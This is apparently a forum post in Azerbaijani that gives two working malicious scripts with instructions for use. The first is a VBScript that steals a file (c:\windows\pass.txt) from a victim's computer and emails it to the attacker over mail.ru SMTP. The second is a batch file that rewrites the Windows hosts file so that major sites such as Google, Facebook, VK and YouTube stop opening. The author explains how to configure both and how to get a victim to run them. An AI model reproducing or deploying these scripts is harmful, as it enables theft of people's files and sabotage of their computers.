bu mövzuda sizə 2 kiçik ancaq cox maraqlı virus təqdim edəcəm
1) VBS sender
bu script visual basic script-də yazılmışdır
məqsədi kiminsə kompunda hansısa bir faylı oğurlamaq dır
Kod:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Call SendPost("smtp.mail.ru","qebuleden@mail.ru","gonderen@mail.ru","Salamlar","")
Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,strBody)
Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")
Set Flds=iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="goderen"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="sifre"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
iMsg.AddAttachment "c:\windows\pass.txt"
iMsg.Send
End Function
Set iMsg=Nothing
Set iConf=Nothing
Set Flds=Nothing
mən onu mail.ru ilə işləməsi üçün nastroyka eləmişəm
deməli bizə 2 mail lazım olacaq , birincisi faylı göndərmək üçün ikincisi qəbul etmək üçün
faylı gonderen@mail.ru göndərəcək, qebuleden@mail.ru isə qəbul edəcək
indi gərək bu kodda parol və logini dəyişəkki mail getsin
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="goderen" burada gonderen login
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="sifre" burada mailin passwordu sifre -dir
hansı faylı oğurlamaq lazım olduğunu isə bura yazırıq iMsg.AddAttachment "c:\windows\pass.txt" göründüyü kimi script windows -dakı pass.txt faylını gönderecek. Lazımlı nastroyka edəndən sonra bu kodu .vbs uzantısı (расширение) ilə soxranit edirik və lazım olan adama gönrəririk
2) Sayt açmağa qadağa qoyan virus
Kod:
@echo off
echo -- >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 vk.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.vk.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 facebook.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.facebook.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 odnoklassniki.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.odnoklassniki.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 google.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 google.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 google.am >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.am >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 bing.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.bing.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 youtube.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.youtube.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 icq.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.icq.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 hotmail.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.hotmail.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
bu virus hosts fayl olan \system32\drivers\etc\ -da yerləşən hosts fayla dəyişikliklər edir
yəni əgər kimsə bu virusu öz kompunda açsa onda kodda yazılmış saytlar onda açılmayacaq. səbəbi odurki o tutalım google.com açanda avtomatik olaraqa browser onu 127.0.0.1 -ə yönəldəcək bu isə local İP olduğunda sayt açılmayacaq.
bu kodu copy edib text faylına paste edib .bat uzantısı ilə soxranit edib lazım olan adama soxuşdururuq
yazmağdan yoruldum )))